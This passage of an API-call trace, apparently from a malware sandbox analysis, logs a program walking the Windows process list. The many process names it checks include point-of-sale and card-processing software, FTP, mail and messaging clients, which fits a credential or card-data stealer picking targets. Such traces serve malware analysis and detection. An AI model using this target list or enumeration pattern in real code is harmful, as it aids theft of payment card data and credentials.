cntUsage=0x0, th32ProcessID=0xa30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="present-agree.exe")) returned 1 [0108.600] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="article.exe")) returned 1 [0108.602] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="populationread.exe")) returned 1 [0108.604] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="play-religious.exe")) returned 1 [0108.606] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="look.exe")) returned 1 [0108.607] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="love.exe")) returned 1 [0108.610] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel final.exe")) returned 1 [0108.612] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0108.614] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0108.615] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0108.617] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0108.618] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0108.620] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0108.622] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1024, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0108.632] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0108.635] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0108.637] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0108.639] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0108.642] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x106c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0108.644] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0108.646] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0108.648] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0108.650] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0108.652] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0108.654] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0108.657] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0108.659] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0108.661] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0108.663] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0108.665] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0108.667] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0108.669] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0108.671] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0108.689] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0108.691] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0108.693] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0108.695] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0108.696] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0108.698] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0108.700] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0108.702] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0108.704] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0108.706] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0108.708] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0108.709] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0108.711] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0108.713] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0108.715] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1228, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0108.716] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0108.719] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0108.721] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x344, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0108.723] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x344, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0108.725] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="HxTsr.exe")) returned 1 [0108.727] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x1384, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0108.729] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0108.730] Process32Next (in: hSnapshot=0x2094, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0108.732] CloseHandle (hObject=0x2094) returned 1 [0108.732] Sleep (dwMilliseconds=0x64) [0108.846] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2154 [0108.858] Process32First (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.860] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x86, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0108.862] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0108.863] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.865] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0108.867] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.869] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0108.870] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0108.872] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0108.873] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.875] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.877] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0108.878] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.880] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.882] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x380, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.883] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.884] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.885] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.887] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.888] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0109.219] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x524, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0109.222] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.224] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x630, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0109.226] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x64c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0109.228] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.230] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0109.232] Process32Next (in: hSnapshot=0x2154, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0109.234] Process32Next (in: 